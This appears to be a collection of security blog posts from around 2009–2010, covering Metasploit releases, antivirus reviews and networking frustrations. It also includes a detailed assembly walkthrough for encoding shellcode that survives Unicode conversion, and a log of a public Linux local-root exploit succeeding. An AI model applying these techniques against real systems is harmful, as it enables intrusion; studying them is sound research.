Metasploitable

We’ve all been there before, having to do a demo to show the dangers of not patching, or insecure operating systems, and then spending ages configuring a vulnerable host for the demo. Or even just wanting to set up a host so that you can better familiarize yourself with Metasploit, it takes a while to build a vulnerable machine, in my experience it actually always seems to take me longer to build an insecure machine than a secure one.

The crew over at Metasploit recently released Metasploitable, which is an Ubuntu 8.04 server install as a VMWare image, it includes a number of vulnerable packages, such as tomcat, mysql, tikiwiki, and others.

This is definetely a move in the right direction if you ask me, as this is just the type of thing that I’ve been looking for, as this is going to save me hours of time, and will be perfect for a lot of my presentation needs, and will also help me to train others up on the many facets of Metasploit.

For more info on Metasploitable, read the Metasploit blog post here.

To download the torrent directly, you can get it from here.

Share

Metasploit 3.4.0 Released

The guys over at Rapid7/Metasploit have been really busy lately, judging by all the new features that have been added to what is one of the most widely used Open Source security tools.

If you’re one of the people that have been running off of the svn builds, then you will have seen these changes coming in gradually, if not, then you’re in for quite a nice suprise.

The new features added to Metasploit 3.4.0 are the following:

Statistics
-Metasploit now has 551 exploit modules and 261 auxiliary modules (from 445 and 216 respectively in v3.3)
-Metasploit is still about twice the size of the nearest Ruby application according to Ohloh.net ( 400K lines of Ruby)
-Over 100 tickets were closed since the last point release and over 200 since v3.3

General
-The dns_enum auxiliary module now supports bruteforcing IPv6 AAAA records thanks to a patch from Rob Fuller
- Command shell sessions can now be automated via scripts using an API similar to Meterpreter
- The console can be automated using Ruby code blocks within resource files
- Initial sound support is available by loading the “sounds” plugin
-The Report mixin and report_* methods are now one-way, you can write to the database but not work with the results. This increases the scalability of the database.
- Many modules report information to the database by default now (auxiliary/scanner/*)
- Lotus Domino version, login bruteforce, and hash collector auxiliary modules
- Upgrade any command shell session to Meterpreter via sessions -u (Windows only)
- The VNC injection payload now uses the latest TightVNC codebase and bypasses Session 0 isolation
- Several modules were renamed to include their Microsoft Technet bulletin number, e.g. ie_xml_corruption is now ms08_078_xml_corruption
- Code can now interface directly with an installed Java Development Kit via a Java mixin. See the java_signed_applet exploit for an example.
- Tomcat and JBoss installations can be exploited to gain sessions (Windows x86/x64, Linux x86/x64)
- The msfencode utility can now generate WAR payloads for Tomcat and JBoss
- Oracle XDB SID brute forcing is much more comprehensive thanks to Thomas Ring
- The msfencode utility can now inject into an existing executable while keeping the original functionality
- The XMLRPC server has been improved and additional APIs are available
- The db_import command now supports NeXpose Simple XML, NeXpose Export XML, Nessus (NBE, XMLv1, XMLv2), QualysGuard XML, and Nmap
- The sqlite3 driver has been deprecated. To ease the transition away from sqlite3, the postgres driver is installed by default in the Linux installer.
- There is a new db_status command that shows which driver is currently in use and whether your database connection is active

Bruteforce Support
- Account brute forcing has been standardized across all login modules
- Login and version scanning module names have been standardized
- The SSH protocol is now supported for brute force and fingerprint scans
- The telnet_login and ssh_login modules now create sessions
- MySQL is now supported for brute forcing, enumeration, service fingerprinting, and arbitrary SQL queries
- Postgres fingerprinting (pre-authentication) using the line numbers in the error messages
- Tomcat is now supported for brute forcing and session creation

Meterpreter
- The Meterpreter process management APIs and commands can now see all processes on WinNT 4.0 -> Windows 7 (32 & 64)
- The Meterpreter can now migrate from 32 to 64 and from 64 to 32, in addition to using a new mechanism to do the migration.
- The Meterpreter adds the steal_token, drop_token, getprivs, and getsystem commands (including kitrap0d integration)
- The Meterpreter pivoting system now supports bidirectional UDP and TCP sockets
- The Meterpreter protocol handle now supports ZLIB compression of data blocks
- The Meterpreter can now take screenshots (jpeg) without process migration and bypasses Session 0 isolation
- The Meterpreter can now stage over a full-encrypted SSL 3.0 connection using the reverse_https stager
- The Meterpreter and Command Shell scripts are now evaluated in the context of a new Rex::Script object
- The “hashdump” Meterpreter script provides a safe way to dump hashes for the local user accounts
- Automatically route through new subnets with the auto_add_route plugin

Thanks for all the hard work guys, Metasploit has come a long way, and I’m looking forward to seeing where it’s going to be in a few months time.

Share

KHOBE: Say hello to my little friend(*)

Guess what? You personal firewall/IDS/Anti Virus/(insert next month’s buzzword here) isn’t going to save you from an attacker successfully executing code remotely on your machine:
http://www.zdnet.com/blog/hardware/update-new-attack-bypasses-every-windows-security-product/8268

So no, it’s not the doomsday weapon, but definitely worthy of the Scarface quote in the title.
This isn’t surprising, researchers find ways to bypass security defenses almost as soon as those defenses are implemented (remember non-executable stack?). Eliminating vulnerabilities in the first place is the way to go, guys, not trying to block attacks hoping your ‘shields’ hold up.

(*) If you’re reading this out loud you need to do so in a thick cuban accent

Share

The complexity of the ad-hoc network (and network research)

After months of intermittent attempts and research, I finally have a connection between two of my laptops, and an Internet connection to the one that is not physically connected to the wired LAN.

(Well, perhaps I might qualify that.  I appear to have a connection to the Internet, and I seem to have been successful at viewing a couple of Websites, and sending one piece of email.  It’s pig slow, and at the moment the mailer is trying to download some email.  It’s made enough of a connection to know that some email is there, but actually retrieving the email is taking enough time that I have been able to start to prep this posting in a browser window while I’m waiting.  I type very slowly, and, as of the end of this paragraph, it hasn’t yet successfully downloaded the second of seven messages.)

(The speed of the connection [although the computer says the connection is "Very Good"] may be due to the fact that I’m using  WEP with 104, rather than 40, bit key.  Don’t know how much difference it would make.  At the moment, having only just established the connection, I’m not about to mess with the settings to find out.)

However, as happy as I am to have the connection, the simple fact of it is not important enough to warrant a blog post.  No, the real point is all the trouble I encountered trying to find out how to make it work.  Following on from the complexity of any computing that I wrote about earlier.
As usual, I made my own life more difficult.  If all I wanted was a simple ad-hoc wireless network, that could be had for the asking.  Well, sort of.  A simple wireless network doesn’t do very much, unless you can share information from the drives, or share an Internet connection.  And that seems to be extra.

(Maybe.  At one point in the process, I had left one of the test wireless networks “on.”  And in one of my classes, one of my students managed to connect to it and get an Internet connection from the wired connection I had.  Random successes aren’t terribly useful, unless you can repeat them.)

Anyway, I have a wired network at home.  I have sharing enabled, so that I can copy materials from one machine to another.  At the moment, all of them run Windows XP.  (Yeah, I know.  I’ll get around to Linux sometime …)  I have (now) multiple laptops, and have to take at least one of them on the road for teaching.  And, of course, the mobile machines have to connect to all kinds of wired and wireless connections on the road.

Of course, the easy way would be to go to London Drugs and get a wireless router, connect it to the wired LAN, and fill in a few simple settings.  It’d probably take no more than a couple of hours, from beginning to end.  But I wouldn’t learn much about ad-hoc networking that way, and I’ve been getting more interested in it, particularly as a security concern, as I have been seeing that “computer-to-computer network” legend show up in more and more places.  (Especially with “Free Internet Connection!” as the network name.)

So, having a spare laptop (since, on a recent teaching trip, it decided to go spare on me), I figured it would be easy to set up a connection between that and the new one.

Actually, it was on the trip that I wanted to start the process.  There was nothing wrong with the old laptop (except that it was a Toshiba, and I’ve had two Toshibas in a row, and I will never again by anything made by Toshiba since they’ve given me nothing but grief for eight years) except that the power supply was becoming unreliable.  I bought a cheap (and non-Toshiba) netbook and asked for advice about connecting them via ad-hoc network in order to transfer the necessary files.

Well, lots of advice, but nothing actually worked, and I fell back on using the Passport external drive my wonderful daughters gave me that has been so useful in so many situations.  But it doesn’t do networking.

The friends gave me some starting points in terms of places to look for advice.  Microsoft, naturally.  There is a wonderful page at http://www.microsoft.com/windowsxp/using/networking/expert/bowman_02april08.mspx which provides clear explanations.  Only a couple of problems: it was written in 2002, so the dialogue boxes have changed.  This piece does talk about sharing an Internet connection, but it doesn’t mention the need to modify the default IP addresses, since everything seems to want to use 192.168.0.1 as a base, and that leads to conflicts.  Bottom line: it doesn’t work.

Microsoft updated the information in 2006 at http://www.microsoft.com/windowsxp/using/networking/setup/adhoc.mspx and the dialogue boxes are closer to what you’ll actually see these days.  After running through that one I tested it out, only to find that the network never does show up on “Available Wireless Networks.”  I’m not sure if this is because, if you choose WEP, and tell it not to broadcast the key, it keeps it hidden.  I did manage to connect to the network, and even seemed to be able to see other computers drives, and see something of the Internet, but all of the connections disappeared over time.  Again, this page says to use Internet Connection Sharing, but doesn’t provide the necessary detail to make it work.

All kinds of pages are out there, if you do a Web search, seemingly based on this same, limited, misinformation.  At http://www.home-network-help.com/ad-hoc-wireless-network.html the author seems to have given some thought to the issue of IP addresses, but not much.  http://www.home-network-help.com/ics-host-computer.html goes into a bit more detail on the IP addresses, but not enough, particularly in terms of the entries that have to be made in various places on various machines.

Finding all the places to make those entries is a trip in and of itself.  The Help and Support Center for XP Home Edition is no help.  At one point I was afraid that the multitude of entries for the various networks I’ve connected to in hotels, airports, and seminar hosting sites had something to do with it, so I went and deleted all of those “Preferred networks” I had accumulated over the years.  (Did you know that they were all still there?)

Lots of people are willing, and more than willing, to provide the benefit of their lack of experience.  I say this, since so many of the entries don’t actually work.  http://www.ehow.com/how_6108229_make-wirelss-internet-_ad_hoc-wireless_.html  Terse, doesn’t work.  http://www.ehow.com/how_5167281_create-ad-hoc-wifi-network.html  Slight tech detail, doesn’t cover sharing drive or Internet connection, doesn’t explain how to make new wireless network visible to “View available wireless networks.”  http://www.ehow.com/how_5154137_create-ad-hoc-network.html  A touch more detail than above (5167281), mentions need to share Internet connection, mentions a dialogue button that doesn’t exist in the XP explanation.  http://www.ehow.com/how_5946176_set-hoc-network-windows-xp.html  Some detail on setting up the network, doesn’t completely work, nothing on sharing.  http://www.ehow.com/way_5492555_ad-hoc-network-tutorial.html  Some detail on setting up the network, doesn’t completely work, nothing on sharing.  http://www.ehow.com/how_5670567_set-ad-hoc-wireless-network.html  Some detail on setting up the network, doesn’t completely work, nothing on sharing, does do XP and Vista.

Some of the advice is contradictory.  For example, I mentioned I was using WEP.  This is because some of the sites, such as http://www.hardwaresecrets.com/article/418 and http://www.tomshardware.com/forum/28615-42-networking-security-problem suggest that WPA and WPA2 can’t be used if the “host” for your ad-hoc network is running Windows XP (which mine is).  Of course, that might be old news, which might have been superceded by intervening upgrades.  But, with this level of information, how am I supposed to tell?

We are awash in a sea of information.  Except that some of the information is misinformative.  As John Lawton stated, the irony of the information Age is that it has given new respectability to uninformed opinion.  This can have rather significant consequences.  A recent CBC story notes that this may play into the May 6 stock market mini-meltdown.

So far, the best clue I received was from http://www.wi-fiplanet.com/tutorials/article.php/3822651  I had frequently seen the “Bridge connections” option, but I somehow never thought to have two networks “selected” when I tried it.  Even then, I might have missed the opportunity.  I got the usual error message, but it suddenly dawned on me that ICS might conflict with it.  (Given that everybody else had been telling me to turn ICS on.)  So, I turned ICS off, and, sure enough, Bridge connections was happy to do just that.

I still have no clue what has been set, and where …

Share

The complexity of the end-user’s computer

Over the years I’ve had to learn a lot about computers.  I’ve written device drivers for the All-in-One system under Vax/VMS.  I know what to do with MS-DOS’s AUTOEXEC.BAT and CONFIG.SYS files.  I’ve learned more word processors than I can remember the names of.  I was using UNIX when that was still a big deal.  Because of some some research that was important in the early days of computer viruses I know a question that will stump any computer forensics expert on the witness stand.

I’m a little afraid of my new netbook.  Within a few months I’ll need to buy a new desktop, and I know I’m going to be more afraid of it.

In the DOS days, I knew pretty much everything that was going on in it.  I knew the hardware, and the system files.  I even had a bunch of tools that would let me see the raw disk and memory.  It was tedious to do so, but it was possible.

Even when Windows 3 and 95 came out, I understood that this was simply a new interface.  I could still examine the system, and make sure everything was as it should be.  I could have confidence and assurance in the computer.  True, there wasn’t any serious protection on it, but, since I knew the full system, I could examine it regularly and make sure that nothing untoward was happening.

Then came Windows NT.  Extra protection on the system, but suddenly every time you turned the system on, 400 files (a number of them system files) got modified.  Change detection lost its security.

Then the later members of that family started adding ties into applications and back again.  And with Windows XP, for the first time, when a friend’s computer got infected, the only solution was to re-install the system.

Complexity is the enemy of security.   However, this goes deeper.  These days we have huge numbers of people using devices that are, as far as they are concerned, magic.  Don’t get me wrong.  I think magic is a lot of fun.  It’s just that magic seems to be defined as inherently unknowable, and these users are not only content with, but actually proud of, their ignorance.

This is dangerous.  When you assume that you cannot know, that seems to absolve you of any responsibility for even trying.  You punch the icons, and do things with no understanding of the consequences.

At the moment, I am trying to set up an ad-hoc wireless network between some of my machines.  I’m not having much luck.  I’ve researched the process, and had suggestions from friends.  I’ve been working at it, off and on, for months.  It still isn’t working.  I can’t find the information I need, either on the process, or in regard to the actual settings on my machines.

Ignorance isn’t bliss.  It’s dangerous.  If I, as a computer, communications, and security specialist of decades of standing, can’t get a simple (well, not quite that simple) network set up, how can we give advice to the novice users of the world on how to keep themswelves safe?

Share

Microsoft Security Essentials review (part 2)

My initial, and superficial, review of MSE is still sparking all kinds of comment.

Today it decided to update itself.  Didn’t ask, of course.  It just tied up the computer for about half an hour.  I was able to get some stuff done, as long as I was willing to wait ridiculous amounts of time for responses.

Share

ASCII gone bad / Zer0-overflow

This post is a followup on my previous post on KISS shellcoding and exploitation. Like before this is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory )
The most common and classic shellcode char restrictions is “zero tolerance”. this can be solved in a verity of different methods. ranging from substitution to polymorphic escape decoders. Solving zero-tolerance is a very useful and thought-provoking problem, however provides a limited amount of fun:). especially once a basic set of solutions has been developed.

Let’s have a look at slightly more challenging problem – can we write shellcode that contains a null char at every other byte, and *only* every other byte, for e.g. s\x00h\x00e\x00l\x00l\x00c\x00o\x00d\x00e0

This can happen if our shellcode were to pass through a call to MultiByteToWideChar() or similar function. This is often encountered in browser bugs (especially DOM and/or scripting).

Some work has been done on this subject, namely a method was described by ngss reasercher Chris Anley. This method was coined “Venetian Blinds” or ”The Venetian exploit”. The method I suggest here is similar, but slightly different in that it does not make as many assumptions and presents a more theoretical approach. This work is an original unrelated effort.

Let us get to it.

Enumerating the methods we can use to write ugly ascii-to-unicode shellcode we find many are similar to regular zero-tolerance or ascii shellcode methods.

We can decode in-place, copy, byte-substitute. These methods will become more clear as you read. In some cases it will be necessary to find eip/getPC.

This also can be done in several ways, similarly to shown in my previous post, but differently( Try encoding FSTENV with null bytes, email me if you succeed :)

It will take many pages to thoroughly cover all of these methods and so I’ll start with the simplest copy method.

Instead of just presenting the final result, I will walk through my thought process working on this. In this post I present several different trials at shellcode, some of which are not immediately useful. This will allow you to better understand the intricacies shellcode-restriction, and get a feel for the different problems I faced.

Let’s copy our code somewhere. If we were to decode in-place, we would essentially write the same code, as well as extra getPC code.

Not as easy as it sounds. let us start from building restriction-compliant basic-blocks which can br used later. These blocks shall suffice:
1) set register
2) string operation
3) branch
4) glue block

These translate to:

1) mov reg32, imm32
2) mov [reg32],imm8
inc reg32 # imm8 !=0
3) jmp/call reg32
4) a “glue block” that can be use between every two blocks, and between two compliant opcodes. This is a compliant block that starts and ends with a null byte. we’ll mark it *GB.

if we want to get a bit fancier we may need:
3) pop reg32
4) mov [reg32],imm16 # imm16 bytes not equal 0
inc reg32
inc reg32

(U) basic block number one: setting a register – attempt 1.0
the following opcode:
mov ecx, 0×11223344
decodes like this:
B9 44332211

which of course is not very helpful to us. The best we can do with our restriction and this basic opcode is:
B9 00330011 == mov ecx, 0×11003300

this is not very useful. we want to be able to put an arbitrary value into r32. let’s divide in to two parts by bytes:

two lower bytes(“3rd and 4th”):let’s start by setting the two lower bytes. this is easy

*GB ; zero-out ecx
push 0
pop ecx

mov edx,77007700 BB00770077 ; use edx as help-reg

*GB
add ch,dh – 00F5 c
mov edx,66006600 – BB00660066.

*GB
add cl,dh – 00F1

This is a good method for the lower bytes. let’s call it “set (cx, 0×1122)”.

Those readers with a keen eye may notice that assembling these opcodes may not result in compliant shellcode.

This is because different byte-sequences may represent the same opcode. x86 opcodes are built of micro-codes or U-codes(with the greek letter mewh). Every Ucode performs a very basic operation. Several of these are dubbed “opcode”. Different sequences of Ucodes may result in the same end and therefore be functionally-equivalent, usually an assembler will choose the faster one.

topmost two bytes:
in order to set the topmost byte we can:

mov ecx,66006600 – BB00660066.

In order to set the topmost byte to zero we can: zero out the whole r32, later setting byte’s 3&4 . this is done by replacing our first opcode with the sequence:
push 0 – 6A00
pop ecx – 59

onwards.

we are now able to set the 1st,3rd, and 4th bytes of a register. how will we set the second? if the value needed is very low or very high we could:
set (cx, 0xFFFF)
*GB

inc ecx – 41
*GB
set (cx, 0xFFFF)
etc.

or

set (cx, 0×0000) ; this is not trivial, but easy
*GB
DEC ecx – 41

etc.

This method is not very space-conservative. let’s try finding a better method.

And now for something completely different – let’s find a better method. This time the process will include taking a peak at the intel x86 reference manual (I used the xeon manual) in search for interesting opcode encodings.

(U) basic block number one: attempt 2.0 – setting the top two bytes.

this time, we’ll try using program memory, specifically – the stack. this may a good method because many stack operations are single-byte. this may be bad, if sp points somewhere unwritable when the shellcode is running(but can be adapted).

fun fact – sifting through the intel reference manual we can see that the set of operands al /ax /eax can provide plenty compliant opcodes which will not be compliant with other registers used. for eg:
MOV DWORD PTR DS:[EBX],110011 – C7 03 11 00 11 00
MOV DWORD PTR DS:[EAX],110011 – C7 00 11 00 11 00

now consider the following opcodes:
push 11003300 – 6800330011
*GB
push esp – 54
*GB
pop eax – 58
*GB
add dword ptr [eax], 00220044
*GB
pop ecx

now ecx == 0×11223344
this is better than we expected. we have set all four bytes.

we already know how to change the two lower-most bytes if we want to zero them out. we also know how to zero out the 2nd topmost byte,or both high bytes. if we want to get 0×00112233 we can use (i’m omitting opcode encoding from hereon):

push 11003300 ; [esp] = 11003300
*GB
push 11003300 ; [esp] = 11003300
*GB
inc esp ; [esp] = 00110033
*GB
pop ecx ; ecx = 00110033
*GB
dec esp ; [esp] = 11003300
pop eax ; to restore stack

and then set the missing low bytes. We already know a different way of doing this – look for it.

Thus we have a compact method of performing mov r32,imm32 for any value.

(U) basic block no. 2: mov [reg32],imm8, inc reg32 # imm8 !=0 – attempt 1.0

First, let’s assume we know what data is present at the copy destination address. In this case, it will be pretty easy to build this BB. We will be using an add operation. here we are adding 0×90 to a one byte at [ecx], and ecx++.

mov eax,90009000 ; ah=90
add byte ptr [ecx],ah ; [ecx] += 0×90
inc ecx

this of course will be padded with *GB whenever needed. if we don’t know what data lays at [ecx] we could try this:
push ecx
pop eax ; eax =ecx
mov byte ptr al,[eax] ; al= [ecx]

;negate eax
push 0
pop ebx
add bh,al ; bh =al == [ecx]
xor ebx, ff00ff00
push 0
pop eax;
add al,bh ; al = al ^ 0xff == [ecx]^0xff
inc al ; al++ == -(byte ptr [ecx] )

;add negated value, and wanted value
mov edx, 11001100
add al,dh
add byte ptr [ecx],al ; [ecx] = [ecx] + (-[ecx] + dh) == dh == 11
inc ecx

once again, padded with *GB. this is not very elegant or small, but seems to work nicely. let’s give it another try. this time using completely different types of opcodes:
push esp
pop edx

inc ecx
inc ecx
inc ecx
inc ecx

push ecx
pop esp

set(ebx,0×90909090)
push ebx

push edx
pop esp

this looks nicer.

(U) 3) jmp/call reg32
this is easy:
push ecx
*GB
retn

(U) 4) the star of the evening – our very own – Glue Block we could try this:
ADD BYTE PTR SS:[EBP],AL – 004500

or this – after setting the right registers.

ADD BYTE PTR DS:[EAX],CL ; (we could probably pull eax off the stack, but can’t use set(eax,0xADDR) because we can’t use this GB, which is needed to do this there are probably a few others. Using these may require us to do minor fixups. this basically sums up everything we need to build a fancy ascii-to-shellcode decoder. now that we have our 4 basic blocks we can use them to program/ like this: 2-3-4-1-1-1-2-3-4-4/ just kidding. :)

An example simple windows code that copies four nop bytes to [7FFE0300 +0x100] looks like this:
what we would really be copying is a short code to find the original shellcode, and decode it. this is pretty simple straight-forward assembly

; ecx = 7FFE0400
68 0004007F PUSH 7F000400
0045 00 ADD BYTE PTR SS:[EBP],AL
54 PUSH ESP ; GB
58 POP EAX
8100 0100FE00 ADD DWORD PTR DS:[EAX],0FE0001
59 POP ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
49 DEC ECX

;al = 0×90

0045 00 ADD BYTE PTR SS:[EBP],AL
B8 00900090 MOV EAX,90009000
00E0 ADD AL,AH

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL; [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX ;ecx++

;byte ptr [ecx] = 0×90
;ecx ++

0001 ADD BYTE PTR DS:[ECX],AL [ecx] = 0×90
0045 00 ADD BYTE PTR SS:[EBP],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
41 INC ECX

;byte ptr [ecx] = 0×90
;ecx ++

0045 00 ADD BYTE PTR SS:[EBP],AL
0001 ADD BYTE PTR DS:[ECX],AL
0045 00 ADD BYTE PTR SS:[EBP],AL

;jmp [ecx-4]

DEC ECX
DEC ECX
DEC ECX
DEC ECX

51 PUSH ECX
0045 00 ADD BYTE PTR SS:[EBP],AL
C3 RET

0000

Of course, all the methods I discussed here can be highly optimized(such using dword values?), and probably some other methods may be used. these are the basics :)

Also, if we want to keep a code-shellcode ratio anything close to plausible, we will have to be able to write small amount of bytes that can find the original chunk and decode it from our
destination address. this can very often be done through use of register and stack state at the time the shellocde started running. we’re in luck with this – pushad is compliant.

Share

Latest Adobe 0-Day Exploit Now In Metasploit

Just reading through Twitter and I saw this from HDM, and thought I’d share

“Adobe PDF 0.9-day added to Metasploit: [msf> use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881″

Night All…

Share

Microsoft Security Essentials review

What with twenty years experience in reviewing AV software, I figured I’d better try it out.

It’s not altogether terrible.  The fact that it’s free, and from Microsoft (and therefore promoted), might reduce the total level of infections, and that would be a good thing.

But even for free software, and from Microsoft, it’s pretty weird.

When I installed it, I did a “quick” scan.

That ran for over an hour on a machine with a drive that’s got about 70 Gb of material on it, mostly not programs.  At that point I hadn’t found out that you can exclude directories (more on that later), so it found my zoo.  It deleted nine copies of Sircam.

Lemme tell ya ’bout my zoo.  It’s got over 1500 files in it.  There are a lot of duplicate files (hence the nine copies of Sircam), and there are files in there that are not malware.  There are files which have had the executable file extensions changed.  But there are a great number of common, executable, dangerous pieces of malware in there, and the only thing MSE found was nine copies of Sircam.

(Which it deleted.  Without asking.  Personally, for me, that’s annoying.  It means I have to repopulate my zoo from backups.  But for most users, that’s probably a good thing.)

Now, when I went to repopulate my zoo, I, of course, opened the zoo directory with Windows Explorer.  And all kinds of bells and whistles went off.  As soon as I “looked” at the directory, the real-time component of MSE found more than the quick scan did.  That probably means the real-time scanner is fairly decent.  (In my situation it’s annoying, so I turned it off.  MSE is now annoyed at me, and continues to be annoyed, with big red flags on my task bar.)
MSE has four alert levels to categorize what it finds, and you have some options for setting the default actions.  The alert levels are severe (options: “Recommended action,” “Remove,” and “Quarantine”), high (options: “Recommended action,” “Remove,” and “Quarantine”), medium (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”), and low (options: “Recommended action,” “Remove,” “Quarantine,” and “Allow”).  Initially, everything is set at “Recommended action.”  I turned everything down to the lowest possible settings: I want information, not strip mining.  However, for most people it would seem to be reasonable to keep it at the default action, which seems to be removal for everything.
I don’t know where it puts the quarantined stuff.  It does have a directory at C:\Documents and Settings\All Users\Application Data\Microsoft Security Essentials, but no quarantined material appears to be there.

(I did try to find out more.  It does have help functions.  If you click on the “Help” button, it sends you to this site.  However, if you click on the link to explain the actions and alert levels, it sends you to this site.  If you examine those two URLs, they are different.  If you click on them, you go to the same place.  At that location, you can get some pages that offer you marketing bumpf, or watch a few videos.  There isn’t much help.)
You can exclude specific files and locations.  Personally, I find that extremely useful, and the only reason that I’d continue using MSE.  It does seem to work: I excluded my zoo before I did a full scan, and none of my zoo disappeared when I did the full scan.  However, for most users, the simple existence of that option could signal a loophole.  If I was a blackhat, first thing I’d do is find out how to exclude myself from the scanner.  (There is also an option to exclude certain file types.)

So I did a full scan.  That took over eight hours.  I don’t know exactly how long it took, I finally had to give up and leave it running.  MSE doesn’t report how long it took to do a scan, it only reports what it found.  (I suspect the total run was around ten or eleven hours.  MSE reports that a full scan can take up to an hour.)

While MSE is running it really bogs down the machine.  According to task manager it doesn’t take up much in the way of machine cycles, but the computer sure isn’t responsive while it’s on.
When I came back and found it had finished, the first thing it wanted me to do was send a bunch of suspect files to Microsoft.  The files were all from my email.  On the plus side, the files were all messages that reported suspect malware or Websites, so it’s possible that we could say MSE is doing a good job in scanning files and examining archives.  (On the other hand, every single message was from Sunbelt Software.  This could be coincidence, but it is also a fact that Sunbelt makes competing AV software, and was formerly associated with a company that Microsoft bought in its race to produce AV and anti-spyware components.)

Then I started to go through what Microsoft said it found, in order to determine what I had lost.

The first item on the list was rated severe.  Apparently I had failed to notice six copies of the EICAR test file on my machine.

Excuse me?  The EICAR test file?  A severe threat?  Microsoft, you have got to be kidding.  And the joke is not funny.

The EICAR test file is a test file.  If anyone doesn’t know what it is, read about it at EICAR, or at Wikipedia if you don’t trust EICAR.  It’s harmless.  Yes, a compatible scanner will report it, but only to show that your scanner is, in fact, working.

It shouldn’t delete or quarantine all copies it finds on the machine.

MSE also said it quarantined fifteen messages from my email for having JavaScript shell code.  Unfortunately, it didn’t say what they were, and I wasn’t sure I could get them back.  I don’t know why they were deleted, or what the trigger was.  MSE isn’t too big on reporting details.  I don’t know whether these messages were simply ones that contained some piece of generic JavaScript, and got boosted up to “severe” level.  Given the EICAR test file experience, I’m not inclined to give Microsoft the benefit of the doubt.

After some considerable work, I did find them.  They seemed to be the “suspect” messages that Microsoft wanted.  And when I tried to recover them, I found that MSE had not quarantined them: they were left in place.  So, at the very least, at times MSE lies to you.

(I guess I’d better add my email directory to places for MSE not to scan.)
MSE quarantined some old DOS utilities.  It quarantined a bunch of old virus simulators (the ones that show you screen displays, not actual infectors).  (Called them weird names, too.)

MSE quarantined Gibson Research‘s DCOMbob.exe.  This is a tool for making sure that DCOM is disabled on your machine.  Since DCOM was the vector for the Blaster worm (among others), and is really hard to turn off under XP, I find this rather dangerous.

OK, final word is that I can use it.  I’ll want to protect certain areas before I do, but that shouldn’t be too much of a concern for most users.

You might want to make sure Microsoft isn’t reading your email …

Share

Ipswitch Means Business

A while back I was fuzzing with Hzzp and found a remote format string vulnerability in Ipswitch’s WS_FTP. But, I couldn’t find a security contact for Ipswitch. I waited a few months and made the vulnerability public. The day afterwards, a representative from Ipswitch contacted me and I explained why I hadn’t contacted them previously. He was eager to get the vulnerability fixed and made the comment that they’ll need to do a better job publicizing the security contact information. I was happy to have had received a more professional, non-automated email from someone who seemed to care about the security of their company’s product.

I didn’t worry too much about the update process. I know it can take some companies months or even years to release new patches for vulnerabilities in their products, which most of the time is completely unreasonable. Then, a little more than two weeks later, I received an email from that same Ipswitch representative informing me that a new release of WS_FTP was available and the date in the Help->About window should say Sept 18th (10 days after we discussed the vulnerability). What an excellent example of how vendors should handle security issues within their products.

Fast response, efficient security policy, good business. Thanks Ipswitch!

Share

Linux Kernel Bashing

This summer may have caused a few burden’s on linux administrators. By all the patching necessary to keep their systems out of the hands of those who would choose to exploit it, unless your using something like Ksplice, you’ve more than likely rebooted many times already. Well, here is one more reason to wake this early this morning…

New exploits for the “Linux NULL pointer dereference due to incorrect proto_ops initializations” vulnerability have been released, here and here. I just tried the second one out myself on a (currently) fully updated Ubuntu Jaunty workstation, with (_default_) successful results.

linux@ubuntu:~/2009-proto_ops$ sh run.sh
run.c: In function ‘main’:
run.c:13: warning: missing sentinel in function call
padlina z lublina!
# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev)
# exit
linux@ubuntu:~/2009-proto_ops$

A reliable local root exploit for that affects all linux kernels 2.x. Feels like 2003 all over again :X

Share

Vanishingly small utility …

This system has had some discussion in the forensics world over the past few days.  Here’s an extract from Science Daily:

“Computers have made it virtually impossible to leave the past behind. College Facebook posts or pictures can resurface during a job interview. A lost cell phone can expose personal photos or text messages. A legal investigation can subpoena the entire contents of a home or work computer. The University of Washington has developed a way to make such information expire. After a set time period, electronic communications such as e-mail, Facebook posts and chat messages would automatically self-destruct, becoming irretrievable from all Web sites, inboxes, outboxes, backup sites and home computers. Not even the sender could retrieve them.

“The team of UW computer scientists developed a prototype system called Vanish that can place a time limit on text uploaded to any Web service through a Web browser.

[Perhaps a bit narrower focus than the original promise, but it is a prototype - rms]

“After a set time text written using Vanish will, in essence, self-destruct.  The Vanish prototype washes away data using the natural turnover, called “churn,” on large file-sharing systems known as peer-to-peer networks. For each message that it sends, Vanish creates a secret key, which it never reveals to the user, and then encrypts the message with that key. It then divides the key into dozens of pieces and sprinkles those pieces on random computers that belong to worldwide file-sharing networks. The file-sharing system constantly changes as computers join or leave the network, meaning that over time parts of the key become permanently inaccessible. Once enough key parts are lost, the original message can no longer be deciphered.”

However, given the promise to clean up social networking sites, and as I started to read the paper, an immediate problem occurred to me.  And, lo and hehold, the authors admit it:

“We therefore focus our threat model and subsequent analyses on attackers who wish to compromise data privacy. Two key properties of our threat model are:
1. Trusted data owners. Users with legitimate access to the same VDOs trust each other.
2. Retroactive attacks on privacy. Attackers do not know which VDOs they wish to access until after the VDOs expire.
The former aspect of the threat model is straightforward, and in fact is a shared assumption with traditional encryption schemes: it would be impossible for our system to protect against a user who chooses to leak or permanently preserve the cleartext contents of a VDO-encapsulated file through out-of-band means. For example, if Ann sends Carla a VDO-encapsulated email, Ann must trust Carla not to print and store a hard-copy of the email in cleartext.”

So, this system works perfectly.  If you only communicate with people you trust (both in terms of intent, and competence), and who only use the system properly, and never use any of the information in any program that is not part of the system, it’s completely secure.

How often have we heard that said?

The default to privacy aspect is interesting, and the automatic transparency for the user as well, but this simply moves the problem one step back, as it were.  In terms of utility to social networking, the social networks would have to be completely rewritten to adher to the system, and even then it would be pretty much impossible to ensure that nobody would have the ability to scrape data and keep or publish it elsewhere.

(Plus, the data is still there, and so is Moore’s Law …)

Share

nmap 5 released

So here’s the news everyone, nmap v5 has been released, and it’s well worth upgrading.

Thanks to this one goes to Fyodor, HDM, and everyone else involved in getting to this point.

Here’s the release notes from insecure.org
The Nmap Changelog describes nearly 600 significant improvements since our last major release (4.50). Here are the highlights:

